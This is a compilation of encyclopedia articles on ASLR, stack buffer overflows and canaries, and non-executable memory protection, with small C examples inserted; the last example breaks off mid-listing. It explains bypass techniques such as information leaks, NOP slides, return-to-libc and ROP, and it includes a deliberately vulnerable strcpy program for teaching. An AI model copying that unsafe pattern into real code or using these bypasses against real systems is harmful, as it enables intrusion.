thousands or millions. On 32-bit systems, a typical amount of entropyNis 8 bits.[6]For 2004 computer speeds, Shacham and co-workers state "... 
16 bits of address randomization can be defeated by a brute force attack within minutes."[7] (The authors' statement depends on the ability to attack the same application multiple times without any delay. Proper implementations of ASLR, like that included in grsecurity, provide several methods to make such brute force attacks infeasible. One method involves preventing an executable from executing for a configurable amount of time if it has crashed a certain number of times.) On modern 64-bit systems, these numbers typically reach the millions at least.[citation needed]

Android[8] and possibly other systems implement library load order randomization, a form of ASLR which randomizes the order in which libraries are loaded. This supplies very little entropy. An approximation of the number of bits of entropy supplied per needed library can be calculated; the approximation does not account for varied library sizes, so the actual entropy gained is somewhat higher. Attackers usually need only one library; the math is more complex with multiple libraries. The case of an attacker using only one library is a simplification of the more complex formula for l = 1. These values tend to be low even for large values of l, most importantly since attackers typically can use only the C standard library and thus one can often assume that β = 1. However, even for a small number of libraries there are a few bits of entropy gained here; it is thus potentially interesting to combine library load order randomization with VMA address randomization to gain a few extra bits of entropy. These extra bits of entropy will not apply to other mmap() segments, only libraries.

Attackers may make use of several methods to reduce the entropy present in a randomized address space, ranging from simple information leaks to attacking multiple bits of entropy per attack (such as by heap spraying). There is little that can be done about this.

It is possible to leak information about memory layout using format string vulnerabilities. Format string functions such as printf use a variable argument list to do their job; format specifiers describe what the argument list looks like. Because of the way arguments are typically passed, each format specifier moves closer to the top of the stack frame. Eventually, the return pointer and stack frame pointer can be extracted, revealing the address of a vulnerable library and the address of a known stack frame; this can eliminate library and stack randomization as an obstacle to an attacker.

One can also decrease entropy in the stack or heap. The stack typically must be aligned to 16 bytes, and so this is the smallest possible randomization interval, while the heap must be page-aligned, typically to 4096 bytes. When attempting an attack, it is possible to align duplicate attacks with these intervals: a NOP slide may be used with shellcode injection, and the string '/bin/sh' can be replaced with '////////bin/sh' for an arbitrary number of slashes when attempting to return to system. The number of bits removed is exactly log2(n) for n intervals attacked. Such decreases are limited due to the amount of data in the stack or heap. The stack, for example, is typically limited to 8 MB[9] and grows to much less; this allows for at most 19 bits, although a more conservative estimate would be around 8–10 bits, corresponding to 4–16 KB[9] of stack stuffing. The heap, on the other hand, is limited by the behavior of the memory allocator; in the case of glibc, allocations above 128 KB are created using mmap, limiting attackers to 5 bits of reduction. This is also a limiting factor when brute forcing; although the number of attacks to perform can be reduced, the size of the attacks is increased enough that the behavior could in some circumstances become apparent to intrusion detection systems.
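The success-probability formulas referred to earlier (for α attempts against N bits of entropy) are not reproduced in this text. As a hedged illustration of how the remaining entropy translates into attack effort, two simple cases can be written down:

    % Illustrative only: probability of guessing N uniformly random bits in \alpha tries.
    % If the layout is re-randomized after every failed attempt (independent guesses):
    P_{\mathrm{independent}}(\alpha, N) \;=\; 1 - \left(1 - 2^{-N}\right)^{\alpha}
    % If the layout stays fixed across attempts (guessing without replacement):
    P_{\mathrm{fixed}}(\alpha, N) \;=\; \min\!\left(\frac{\alpha}{2^{N}},\; 1\right)

For N = 8 bits, roughly 180 independent attempts already give about an even chance of success, which is consistent with the minutes-scale brute-force results quoted above.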
ASLR-protected addresses can be leaked by various side channels, undermining the usefulness of the mitigation. Recent attacks have used information leaked by the CPU branch target predictor buffer (BTB) or by the memory management unit (MMU) walking page tables. It is not clear whether this class of ASLR attack can be mitigated; if it cannot, the benefit of ASLR is reduced or eliminated.

In August 2024, a paper[10] was published presenting an empirical analysis of major desktop platforms, including Linux, macOS, and Windows, examining the variability in the placement of memory objects across processes, threads, and system restarts. The results show that while some systems as of 2024, like Linux distributions, provide robust randomization, others, like Windows and macOS, often fail to adequately randomize key areas such as executable code and libraries. The authors also found a significant reduction in the entropy of libraries after Linux kernel version 5.18 and identified correlation paths that an attacker could leverage to reduce exploitation complexity significantly.

Several mainstream, general-purpose operating systems implement ASLR.

Android 4.0 Ice Cream Sandwich provides address space layout randomization (ASLR) to help protect system and third-party applications from exploits due to memory-management issues. Position-independent executable support was added in Android 4.1.[11] Android 5.0 dropped non-PIE support and requires all dynamically linked binaries to be position independent.[12][13] Library load ordering randomization was accepted into the Android open-source project on 26 October 2015,[8] and was included in the Android 7.0 release.

DragonFly BSD has an implementation of ASLR based upon OpenBSD's model, added in 2010.[14] It is off by default, and can be enabled by setting the sysctl vm.randomize_mmap to 1.

Support for ASLR appeared in FreeBSD 13.0.[15][16] It has been enabled by default since 13.2.[17]

Apple introduced ASLR in iOS 4.3 (released March 2011).[18] KASLR was introduced in iOS 6.[19] The randomized kernel base is 0x01000000 + ((1+0xRR) * 0x00200000), where 0xRR is a random byte from SHA1 (random data) generated by iBoot (the second-stage iOS boot loader).[20]

The Linux kernel has enabled a weak form of ASLR by default since kernel version 2.6.12, released in June 2005.[21] The PaX and Exec Shield patchsets to the Linux kernel provide more complete implementations. The Exec Shield patch for Linux supplies 19 bits of stack entropy on a period of 16 bytes, and 8 bits of mmap base randomization on a period of one page of 4096 bytes. This places the stack base in an area 8 MB wide containing 524,288 possible positions, and the mmap base in an area 1 MB wide containing 256 possible positions.

ASLR can be disabled for a specific process by changing its execution domain, using personality(2).[22] A number of sysctl options control the behavior of mainline ASLR.
For example,kernel.randomize_va_spacecontrolswhatto randomize; the strongest option is 2.vm.mmap_rnd_bitscontrols how many bits to randomize formmap.[23] Position-independent executable(PIE) implements a random base address for the main executable binary and has been in place since April 18, 2004. It provides the same address randomness to the main executable as being used for the shared libraries. The PIE feature cannot be used together with theprelinkfeature for the same executable. The prelink tool implements randomization at prelink time rather than runtime, because by design prelink aims to handle relocating libraries before the dynamic linker has to, which allows the relocation to occur once for many runs of the program. As a result, real address space randomization would defeat the purpose of prelinking. In 2014, Marco-Gisbert and Ripoll disclosedoffset2libtechnique that weakens Linux ASLR for PIE executables. Linux kernels load PIE executables right after their libraries; as a result, there is a fixed offset between the executable and the library functions. If an attacker finds a way to find the address of a function in the executable, the library addresses are also known. They demonstrated an attack that finds the address in fewer than 400 tries. They proposed a newrandomize_va_space=3option to randomize the placement of the executable relative to the library,[6]but it is yet to be incorporated into the upstream as of 2024.[24] The Linux kernel 5.18 released May 2022 reduced the effectiveness of both 32-bit and 64-bit implementations. Linux filesystems callthp_get_unmapped_areato respond to a file-backedmmap. With a change in 5.18, files greater than 2 MiB are made to return 2 MiB-aligned addresses, so they can be potentially backed byhuge pages. (Previously, the increased alignment only applied to Direct Access (DAX) mappings.) In the meantime, the C library (libc) has, over time, grown in size to exceed this 2 MiB threshold, so instead of being aligned to a (typically) 4 KiB page boundary as before, these libraries are now 2 MiB-aligned: a loss of 9 bits of entropy. For 32-bit Linux, many distributions show no randomizationat allin the placement of the libc. For 64-bit Linux, the 28 bits of entropy is reduced to 19 bits. 
In response, Ubuntu has increased itsmmap_rnd_bitssetting.[25]Martin Doucha added aLinux Test Projecttestcase to detect this issue.[26] Kernel address space layout randomization (KASLR) enables address space randomization for the Linux kernel image by randomizing where the kernel code is placed at boot time.[27]KASLR was merged into theLinux kernel mainlinein kernel version 3.14, released on 30 March 2014.[28]When compiled in, it can be disabled at boot time by specifyingnokaslras one of the kernel's boot parameters.[29] There are severalside-channel attacksin x86 processors that could leak kernel addresses.[30][31]In late 2017,kernel page-table isolation(KPTI aka KAISER) was developed to defeat these attacks.[32][33]However, this method cannot protect against side-channel attacks utilizing collisions inbranch predictorstructures.[34] As of 2021[update], finer grained kernel address space layout randomization (or function granular KASLR, FGKASLR) is a planned extension of KASLR to randomize down to the function level by placing functions in separate sections and reordering them at boot time.[35] Microsoft'sWindows Vista(released January 2007) and later have ASLR enabled only for executables anddynamic link librariesthat are specifically linked to be ASLR-enabled.[36]For compatibility, it is not enabled by default for other applications. Typically, only older software is incompatible and ASLR can be fully enabled by editing a registry entryHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages,[37]or by installing Microsoft'sEnhanced Mitigation Experience Toolkit. The locations of theheap,stack, Process Environment Block, andThread Environment Blockare also randomized. A security whitepaper from Symantec noted that ASLR in 32-bit Windows Vista may not be as robust as expected, and Microsoft has acknowledged a weakness in its implementation.[38] Host-basedintrusion prevention systemssuch asWehnTrust[39]andOzone[40]also offer ASLR forWindows XPandWindows Server 2003operating systems. WehnTrust is open-source.[41]Complete details of Ozone's implementation are not available.[42] It was noted in February 2012[43]that ASLR on 32-bit Windows systems prior toWindows 8can have its effectiveness reduced in low memory situations. A similar effect also had been achieved on Linux in the same research. The test code caused the Mac OS X 10.7.3 system tokernel panic, so it was left unclear about its ASLR behavior in this scenario. 
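Returning to the Linux implementation discussed above, the personality(2) mechanism mentioned earlier can be used to launch a program with randomization disabled, which is roughly what setarch --addr-no-randomize does. The following is a minimal, Linux-specific sketch with error handling omitted:

    #include <stdio.h>
    #include <sys/personality.h>
    #include <unistd.h>

    /* Disable ASLR for a child program via the ADDR_NO_RANDOMIZE persona flag. */
    int main(int argc, char **argv)
    {
        if (argc < 2) {
            fprintf(stderr, "usage: %s program [args...]\n", argv[0]);
            return 1;
        }
        int persona = personality(0xffffffff);              /* query current persona */
        personality((unsigned long)persona | ADDR_NO_RANDOMIZE); /* turn randomization off */
        execvp(argv[1], &argv[1]);                           /* run the target program */
        perror("execvp");
        return 127;
    }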
Support for ASLR in userland appeared inNetBSD5.0 (released April 2009),[44]and was enabled by default in NetBSD-current in April 2016.[45] Kernel ASLR support on amd64 was added in NetBSD-current in October 2017, making NetBSD the first BSD system to support KASLR.[46] In 2003,OpenBSDbecame the first mainstream operating system to support a strong form of ASLR and to activate it by default.[4]OpenBSD completed its ASLR support in 2008 when it added support forPIEbinaries.[47]OpenBSD 4.4'smalloc(3)was designed to improve security by taking advantage of ASLR and gap page features implemented as part of OpenBSD'smmapsystem call, and to detect use-after-free bugs.[48]Released in 2013, OpenBSD 5.3 was the first mainstream operating system to enable position-independent executables by default on multiplehardware platforms, and OpenBSD 5.7 activated position-independent static binaries (Static-PIE) by default.[47] InMac OS X Leopard10.5 (released October 2007), Apple introduced randomization for system libraries.[49] InMac OS X Lion10.7 (released July 2011), Apple expanded their implementation to cover all applications, stating "address space layout randomization (ASLR) has been improved for all applications. It is now available for 32-bit apps (as are heap memory protections), making 64-bit and 32-bit applications more resistant to attack."[50] As ofOS X Mountain Lion10.8 (released July 2012) and later, the entire system including the kernel as well askextsand zones are randomly relocated during system boot.[51] ASLR has been introduced inSolarisbeginning with Solaris 11.1 (released October 2012). ASLR in Solaris 11.1 can be set system-wide, per zone, or on a per-binary basis.[52] Aside-channel attackutilizingbranch target bufferwas demonstrated to bypass ASLR protection.[34]In 2017, an attack named "ASLR⊕Cache" was demonstrated which could defeat ASLR in a web browser using JavaScript.[53]
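As a hands-on complement to the per-platform notes above, the randomization can be observed directly by printing a few representative addresses and running the program several times; on a system with ASLR enabled, most of the values change between runs (a minimal sketch, assuming a Unix-like platform):

    #include <stdio.h>
    #include <stdlib.h>

    /* Print addresses from different memory regions.  Run the program several
       times: with ASLR active, most of these change per run.  The "code"
       address only varies if the binary is built as a position-independent
       executable (e.g. cc -pie -fPIE demo.c). */
    int main(void)
    {
        int on_stack;                       /* stack variable  */
        void *on_heap = malloc(16);         /* heap allocation */

        printf("code  (main)   : %p\n", (void *)main);
        printf("libc  (printf) : %p\n", (void *)printf);
        printf("stack (local)  : %p\n", (void *)&on_stack);
        printf("heap  (malloc) : %p\n", on_heap);

        free(on_heap);
        return 0;
    }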
https://en.wikipedia.org/wiki/Address_space_layout_randomization
In software, astack buffer overfloworstack buffer overrunoccurs when a program writes to amemoryaddress on the program'scall stackoutside of the intended data structure, which is usually a fixed-lengthbuffer.[1][2]Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, and in cases where the overflow was triggered by mistake, will often cause the program to crash or operate incorrectly. Stack buffer overflow is a type of the more general programming malfunction known asbuffer overflow(or buffer overrun).[1]Overfilling a buffer on the stack is more likely to derail program execution than overfilling a buffer on the heap because the stack contains the return addresses for all active function calls. A stack buffer overflow can be caused deliberately as part of an attack known asstack smashing. If the affected program is running with special privileges, or accepts data from untrusted network hosts (e.g. awebserver) then the bug is a potentialsecurity vulnerability. If the stack buffer is filled with data supplied from an untrusted user then that user can corrupt the stack in such a way as to inject executable code into the running program and take control of the process. This is one of the oldest and more reliable methods forattackersto gain unauthorized access to a computer.[3][4][5] The canonical method forexploitinga stack-based buffer overflow is to overwrite the function return address with a pointer to attacker-controlled data (usually on the stack itself).[3][6]This is illustrated withstrcpy()in the following example: This code takes an argument from the command line and copies it to a local stack variablec. This works fine for command-line arguments smaller than 12 characters (as can be seen in figure B below). Any arguments larger than 11 characters long will result in corruption of the stack. (The maximum number of characters that is safe is one less than the size of the buffer here because in the C programming language, strings are terminated by a null byte character. A twelve-character input thus requires thirteen bytes to store, the input followed by the sentinel zero byte. The zero byte then ends up overwriting a memory location that's one byte beyond the end of the buffer.) The program stack infoo()with various inputs: In figure C above, when an argument larger than 11 bytes is supplied on the command linefoo()overwrites local stack data, the saved frame pointer, and most importantly, the return address. Whenfoo()returns, it pops the return address off the stack and jumps to that address (i.e. starts executing instructions from that address). Thus, the attacker has overwritten the return address with a pointer to the stack bufferchar c[12], which now contains attacker-supplied data. In an actual stack buffer overflow exploit the string of "A"'s would instead beshellcodesuitable to the platform and desired function. If this program had special privileges (e.g. theSUIDbit set to run as thesuperuser), then the attacker could use this vulnerability to gain superuser privileges on the affected machine.[3] The attacker can also modify internal variable values to exploit some bugs. With this example: There are typically two methods that are used to alter the stored address in the stack - direct and indirect. 
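The listing referred to above is not reproduced in this text. The following is a minimal reconstruction of the kind of program being described, using the foo() and char c[12] names from the surrounding discussion:

    #include <string.h>

    void foo(char *bar)
    {
        char c[12];            /* fixed-size buffer on the stack */
        strcpy(c, bar);        /* no bounds checking: inputs longer than 11
                                  characters overflow c and corrupt the saved
                                  frame pointer and return address */
    }

    int main(int argc, char **argv)
    {
        if (argc > 1)
            foo(argv[1]);      /* the attacker controls argv[1] */
        return 0;
    }

Note that many modern toolchains enable the stack protections discussed in the following paragraphs by default, so reproducing the classic behavior typically requires flags such as -fno-stack-protector.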
Attackers started developing indirect attacks, which have fewer dependencies, in order to bypass protection measures that were made to reduce direct attacks.[7] A number of platforms have subtle differences in their implementation of the call stack that can affect the way a stack buffer overflow exploit will work. Some machine architectures store the top-level return address of the call stack in a register. This means that any overwritten return address will not be used until a later unwinding of the call stack. Another example of a machine-specific detail that can affect the choice of exploitation techniques is the fact that mostRISC-style machine architectures will not allow unaligned access to memory.[8]Combined with a fixed length for machine opcodes, this machine limitation can make the technique of jumping to the stack almost impossible to implement (with the one exception being when the program actually contains the unlikely code to explicitly jump to the stack register).[9][10] Within the topic of stack buffer overflows, an often-discussed-but-rarely-seen architecture is one in which the stack grows in the opposite direction. This change in architecture is frequently suggested as a solution to the stack buffer overflow problem because any overflow of a stack buffer that occurs within the same stack frame cannot overwrite the return pointer. However, any overflow that occurs in a buffer from a previous stack frame will still overwrite a return pointer and allow for malicious exploitation of the bug.[11]For instance, in the example above, the return pointer forfoowill not be overwritten because the overflow actually occurs within the stack frame formemcpy. However, because the buffer that overflows during the call tomemcpyresides in a previous stack frame, the return pointer formemcpywill have a numerically higher memory address than the buffer. This means that instead of the return pointer forfoobeing overwritten, the return pointer formemcpywill be overwritten. At most, this means that growing the stack in the opposite direction will change some details of how stack buffer overflows are exploitable, but it will not reduce significantly the number of exploitable bugs.[citation needed] Over the years, a number ofcontrol-flow integrityschemes have been developed to inhibit malicious stack buffer overflow exploitation. These may usually be classified into three categories: Stack canaries, named for their analogy to acanary in a coal mine, are used to detect a stack buffer overflow before execution of malicious code can occur. This method works by placing a small integer, the value of which is randomly chosen at program start, in memory just before the stack return pointer. Most buffer overflows overwrite memory from lower to higher memory addresses, so in order to overwrite the return pointer (and thus take control of the process) the canary value must also be overwritten. This value is checked to make sure it has not changed before a routine uses the return pointer on the stack.[2]This technique can greatly increase the difficulty of exploiting a stack buffer overflow because it forces the attacker to gain control of the instruction pointer by some non-traditional means such as corrupting other important variables on the stack.[2] Another approach to preventing stack buffer overflow exploitation is to enforce a memory policy on the stack memory region that disallows execution from the stack (W^X, "Write XOR Execute"). 
This means that in order to execute shellcode from the stack an attacker must either find a way to disable the execution protection for that memory, or find a way to put their shellcode payload in a non-protected region of memory. This method is becoming more popular now that hardware support for the no-execute flag is available in most desktop processors.

While this method prevents the canonical stack smashing exploit, stack overflows can be exploited in other ways. First, it is common to find ways to store shellcode in unprotected memory regions like the heap, and so very little need change in the way of exploitation.[12]

Another attack is the so-called return-to-libc method for shellcode creation. In this attack the malicious payload will load the stack not with shellcode, but with a proper call stack so that execution is vectored to a chain of standard library calls, usually with the effect of disabling memory execute protections and allowing shellcode to run as normal.[13] This works because the execution never actually vectors to the stack itself. A variant of return-to-libc is return-oriented programming (ROP), which sets up a series of return addresses, each of which executes a small sequence of cherry-picked machine instructions within the existing program code or system libraries, with each sequence ending in a return. These so-called gadgets each accomplish some simple register manipulation or similar execution before returning, and stringing them together achieves the attacker's ends. It is even possible to use "returnless" return-oriented programming by exploiting instructions or groups of instructions that behave much like a return instruction.[14]

Instead of separating the code from the data, another mitigation technique is to introduce randomization to the memory space of the executing program. Since the attacker needs to determine where executable code that can be used resides, either an executable payload is provided (with an executable stack) or one is constructed using code reuse such as in ret2libc or return-oriented programming (ROP). Randomizing the memory layout will, as a concept, prevent the attacker from knowing where any code is. However, implementations typically will not randomize everything; usually the executable itself is loaded at a fixed address, and hence even when ASLR (address space layout randomization) is combined with a non-executable stack the attacker can use this fixed region of memory. Therefore, all programs should be compiled with PIE (position-independent executables) so that even this region of memory is randomized. The entropy of the randomization differs from implementation to implementation, and a low enough entropy can in itself be a problem in terms of brute forcing the memory space that is randomized.

The previous mitigations make the steps of exploitation harder, but it is still possible to exploit a stack buffer overflow if certain vulnerabilities are present or certain conditions are met.[15]

An attacker can exploit a format string vulnerability to reveal memory locations in the vulnerable program.[16]

When Data Execution Prevention is enabled to forbid any execute access to the stack, the attacker can still use the overwritten return address (the instruction pointer) to point to data in a code segment (.text on Linux) or any other executable section of the program. The goal is to reuse existing code.[17]

Another variant consists of overwriting the return pointer so that it points slightly before a return instruction (ret on x86) in the program.
The instructions between the new return target and that return instruction will be executed, and the return instruction will then return to the payload controlled by the exploiter.[17]

Jump-oriented programming is a technique that uses jump instructions, rather than the ret instruction, to reuse existing code.[18]

A limitation of ASLR implementations on 64-bit systems is that they are vulnerable to memory disclosure and information leakage attacks: an attacker who can reveal a single function address through an information leak can use it to mount a ROP attack despite the ASLR protection.[19]
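As a hedged, purely conceptual illustration of the canary check described earlier: real canaries are inserted by the compiler (for example via -fstack-protector) between the local buffers and the saved return address, and the variable layout below is not guaranteed by the C standard, so this sketch only demonstrates the check-before-return pattern rather than real protection:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <time.h>

    static unsigned long global_canary;       /* chosen randomly at program start */

    void vulnerable_copy(const char *input)
    {
        unsigned long canary = global_canary; /* local copy of the guard value   */
        char buf[16];

        strcpy(buf, input);                   /* unchecked copy, as in the text  */

        if (canary != global_canary) {        /* guard overwritten => overflow   */
            fputs("stack smashing detected: aborting\n", stderr);
            abort();
        }
    }

    int main(int argc, char **argv)
    {
        srand((unsigned)time(NULL));
        global_canary = ((unsigned long)rand() << 16) ^ (unsigned long)rand();
        vulnerable_copy(argc > 1 ? argv[1] : "short input");
        return 0;
    }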
https://en.wikipedia.org/wiki/Stack_canary
Incomputer security,executable-space protectionmarksmemoryregions as non-executable, such that an attempt to executemachine codein these regions will cause anexception. It relies on hardware features such as theNX bit(no-execute bit), or on software emulation when hardware support is unavailable. Software emulation often introduces a performance cost, oroverhead(extra processing time or resources), while hardware-based NX bit implementations have no measurable performance impact. Early systems like theBurroughs 5000, introduced in 1961, implemented executable-space protection using atagged architecture(memory tagging to distinguish code from data), a precursor to modern NX bit technology. Today, operating systems use executable-space protection to mark writable memory areas, such as thestackandheap, as non-executable, helping to preventbuffer overflowexploits. These attacks rely on some part of memory, usually the stack, being both writable and executable; if it is not, the attack fails. Many operating systems implement or have an available executable space protection policy. Here is a list of such systems in alphabetical order, each with technologies ordered from newest to oldest. A technology supplying Architecture Independentemulationwill be functional on all processors which aren't hardware supported. The "Other Supported" line is for processors which allow some grey-area method, where an explicit NX bit doesn't exist yet hardware allows one to be emulated in some way. As ofAndroid2.3 and later, architectures which support it have non-executable pages by default, including non-executable stack and heap.[1][2][3] Initial support for theNX bit, onx86-64andIA-32processors that support it, first appeared inFreeBSD-CURRENT on June 8, 2004. It has been in FreeBSD releases since the 5.3 release. TheLinux kernelsupports the NX bit onx86-64andIA-32processors that support it, such as modern 64-bit processors made by AMD, Intel, Transmeta and VIA. The support for this feature in the 64-bit mode on x86-64 CPUs was added in 2004 byAndi Kleen, and later the same year,Ingo Molnáradded support for it in 32-bit mode on 64-bit CPUs. These features have been part of theLinux kernel mainlinesince the release of kernel version 2.6.8 in August 2004.[4] The availability of the NX bit on 32-bit x86 kernels, which may run on both 32-bit x86 CPUs and 64-bit IA-32-compatible CPUs, is significant because a 32-bit x86 kernel would not normally expect the NX bit that anAMD64orIA-64supplies; the NX enabler patch assures that these kernels will attempt to use the NX bit if present. Some desktopLinux distributions, such asFedora,UbuntuandopenSUSE, do not enable the HIGHMEM64 option by default in their default kernels, which is required to gain access to the NX bit in 32-bit mode, because thePAEmode that is required to use the NX bit causes boot failures on pre-Pentium Pro(including Pentium MMX) andCeleron MandPentium Mprocessors without NX support. Other processors that do not support PAE areAMD K6and earlier,Transmeta Crusoe,VIA C3and earlier, andGeodeGX and LX.VMware Workstationversions older than 4.0,Parallels Workstationversions older than 4.0, andMicrosoft Virtual PCandVirtual Serverdo not support PAE on the guest. Fedora Core 6 and Ubuntu 9.10 and later provide a kernel-PAE package which supports PAE and NX. NX memory protection has always been available in Ubuntu for any systems that had the hardware to support it and ran the 64-bit kernel or the 32-bit server kernel. 
The 32-bit PAE desktop kernel (linux-image-generic-pae) in Ubuntu 9.10 and later, also provides the PAE mode needed for hardware with the NX CPU feature. For systems that lack NX hardware, the 32-bit kernels now provide an approximation of the NX CPU feature via software emulation that can help block many exploits an attacker might run from stack or heap memory. Non-execute functionality has also been present for other non-x86 processors supporting this functionality for many releases. Red Hatkernel developerIngo Molnárreleased a Linux kernel patch namedExec Shieldto approximate and utilize NX functionality on32-bitx86 CPUs. The Exec Shield patch was released to theLinux kernel mailing liston May 2, 2003, but was rejected for merging with the base kernel because it involved some intrusive changes to core code in order to handle the complex parts of the emulation. Exec Shield's legacy CPU support approximates NX emulation by tracking the upper code segment limit. This imposes only a few cycles of overhead during context switches, which is for all intents and purposes immeasurable. For legacy CPUs without an NX bit, Exec Shield fails to protect pages below the code segment limit; an mprotect() call to mark higher memory, such as the stack, executable will mark all memory below that limit executable as well. Thus, in these situations, Exec Shield's schemes fails. This is the cost of Exec Shield's low overhead. Exec Shield checks for twoELFheader markings, which dictate whether the stack or heap needs to be executable. These are called PT_GNU_STACK and PT_GNU_HEAP respectively. Exec Shield allows these controls to be set for both binary executables and for libraries; if an executable loads a library requiring a given restriction relaxed, the executable will inherit that marking and have that restriction relaxed. The PaX NX technology can emulate NX functionality, or use a hardware NX bit. PaX works on x86 CPUs that do not have the NX bit, such as 32-bit x86. The Linuxkernelstill does not ship with PaX (as of May, 2007); the patch must be merged manually. PaX provides two methods of NX bit emulation, called SEGMEXEC and PAGEEXEC. The SEGMEXEC method imposes a measurable but low overhead, typically less than 1%, which is a constant scalar incurred due to the virtual memory mirroring used for the separation between execution and data accesses.[5]SEGMEXEC also has the effect of halving the task's virtual address space, allowing the task to access less memory than it normally could. This is not a problem until the task requires access to more than half the normal address space, which is rare. SEGMEXEC does not cause programs to use more system memory (i.e. RAM), it only restricts how much they can access. On 32-bit CPUs, this becomes 1.5 GB rather than 3 GB. PaX supplies a method similar to Exec Shield's approximation in the PAGEEXEC as a speedup; however, when higher memory is marked executable, this method loses its protections. In these cases, PaX falls back to the older, variable-overhead method used by PAGEEXEC to protect pages below the CS limit, which may become quite a high-overhead operation in certainmemory access patterns. When the PAGEEXEC method is used on a CPU supplying a hardware NX bit, the hardware NX bit is used, thus no significant overhead is incurred. PaX supplies mprotect() restrictions to prevent programs from marking memory in ways that produce memory useful for a potentialexploit. 
This policy causes certain applications to cease to function, but it can be disabled for affected programs. PaX allows individual control over the following functions of the technology for each binary executable: PaX ignores both PT_GNU_STACK and PT_GNU_HEAP. In the past, PaX had a configuration option to honor these settings but that option has been removed for security reasons, as it was deemed not useful. The same results of PT_GNU_STACK can normally be attained by disabling mprotect() restrictions, as the program will normally mprotect() the stack on load. This may not always be true; for situations where this fails, simply disabling both PAGEEXEC and SEGMEXEC will effectively remove all executable space restrictions, giving the task the same protections on its executable space as a non-PaX system. macOSfor Intel supports the NX bit on all CPUs supported by Apple (from Mac OS X 10.4.4 – the first Intel release – onwards). Mac OS X 10.4 only supported NX stack protection. In Mac OS X 10.5, all 64-bit executables have NX stack and heap; W^X protection. This includesx86-64(Core 2 or later) and 64-bitPowerPCon theG5Macs. As ofNetBSD2.0 and later (December 9, 2004), architectures which support it have non-executable stack and heap.[6] Architectures that have per-page granularity consist of:alpha,amd64,hppa,i386(withPAE),powerpc(ibm4xx),sh5,sparc(sun4m,sun4d), sparc64. Architectures that can only support these with region granularity are: i386 (without PAE), other powerpc (such as macppc). Other architectures do not benefit from non-executable stack or heap; NetBSD does not by default use any software emulation to offer these features on those architectures. A technology in theOpenBSDoperating system, known as W^X, marks writable pages by default as non-executable on processors that support that. On 32-bitx86processors, the code segment is set to include only part of the address space, to provide some level of executable space protection. OpenBSD 3.3 shipped May 1, 2003, and was the first to include W^X. Solarishas supported globally disabling stack execution on SPARC processors since Solaris 2.6 (1997); in Solaris 9 (2002), support for disabling stack execution on a per-executable basis was added. The first implementation of a non-executable stack for Windows (NT 4.0, 2000 and XP) was published by SecureWave via their SecureStack product in 2001, based on the work of PaX.[7][8] Starting withWindows XPService Pack2 (2004) andWindows Server 2003Service Pack 1 (2005), the NX features were implemented for the first time on thex86architecture. Executable space protection on Windows is called "Data Execution Prevention" (DEP). Under Windows XP or Server 2003 NX protection was used on criticalWindows servicesexclusively by default. If thex86processor supported this feature in hardware, then the NX features were turned on automatically in Windows XP/Server 2003 by default. If the feature was not supported by the x86 processor, then no protection was given. Early implementations of DEP provided noaddress space layout randomization(ASLR), which allowed potentialreturn-to-libc attacksthat could have been feasibly used to disable DEP during an attack.[9]ThePaXdocumentation elaborates on why ASLR is necessary;[10]a proof-of-concept was produced detailing a method by which DEP could be circumvented in the absence of ASLR.[11]It may be possible to develop a successful attack if the address of prepared data such as corrupted images orMP3scan be known by the attacker. 
Microsoft added ASLR functionality inWindows VistaandWindows Server 2008. On this platform, DEP is implemented through the automatic use ofPAEkernelin 32-bit Windows and the native support on 64-bit kernels. Windows Vista DEP works by marking certain parts of memory as being intended to hold only data, which the NX or XD bit enabled processor then understands as non-executable.[12]In Windows, from version Vista, whether DEP is enabled or disabled for a particular process can be viewed on theProcesses/Detailstab in theWindows Task Manager. Windows implements software DEP (without the use of theNX bit) through Microsoft's "SafeStructured Exception Handling" (SafeSEH). For properly compiled applications, SafeSEH checks that, when an exception is raised during program execution, the exception's handler is one defined by the application as it was originally compiled. The effect of this protection is that an attacker is not able to add his own exception handler which he has stored in a data page through unchecked program input.[12][13] When NX is supported, it is enabled by default. Windows allows programs to control which pages disallow execution through itsAPIas well as through the section headers in aPE file. In the API, runtime access to the NX bit is exposed through theWin32API callsVirtualAlloc[Ex]andVirtualProtect[Ex]. Each page may be individually flagged as executable or non-executable. Despite the lack of previous x86 hardware support, both executable and non-executable page settings have been provided since the beginning. On pre-NX CPUs, the presence of the 'executable' attribute has no effect. It was documented as if it did function, and, as a result, most programmers used it properly. In the PE file format, each section can specify its executability. The execution flag has existed since the beginning of the format and standardlinkershave always used this flag correctly, even long before the NX bit. Because of this, Windows is able to enforce the NX bit on old programs. Assuming the programmer complied with "best practices", applications should work correctly now that NX is actually enforced. Only in a few cases have there been problems; Microsoft's own .NET Runtime had problems with the NX bit and was updated. In Microsoft'sXbox, although the CPU does not have the NX bit, newer versions of theXDKset the code segment limit to the beginning of the kernel's.datasection (no code should be after this point in normal circumstances). Starting with version 51xx, this change was also implemented into the kernel of new Xboxes. This broke the techniques old exploits used to become aterminate-and-stay-resident program. However, new exploits were quickly released supporting this new kernel version because the fundamental vulnerability in the Xbox kernel was unaffected. Where code is written and executed at runtime—aJIT compileris a prominent example—the compiler can potentially be used to produce exploit code (e.g. usingJIT Spray) that has been flagged for execution and therefore would not be trapped.[14][15] Return-oriented programmingcan allow an attacker to execute arbitrary code even when executable space protection is enforced.
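As a hedged illustration of the write-versus-execute distinction that runs through this section, the following sketch (x86-64, POSIX; essentially what a tiny JIT compiler must do, and exactly what W^X policies constrain) places a few bytes of machine code in a writable page and only then flips the page to read-and-execute before calling it; without the mprotect() step, the call would fault on an NX-enforcing system:

    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    /* x86-64 machine code for:  mov eax, 42 ; ret  */
    static const unsigned char code[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };

    int main(void)
    {
        size_t page = (size_t)sysconf(_SC_PAGESIZE);

        /* 1. Allocate a writable (but not executable) anonymous page. */
        unsigned char *buf = mmap(NULL, page, PROT_READ | PROT_WRITE,
                                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (buf == MAP_FAILED) return 1;

        /* 2. Write the code while the page is writable. */
        memcpy(buf, code, sizeof code);

        /* 3. Drop write permission and add execute (W^X: never both at once).
              Calling buf before this step would crash under NX/DEP enforcement. */
        if (mprotect(buf, page, PROT_READ | PROT_EXEC) != 0) return 1;

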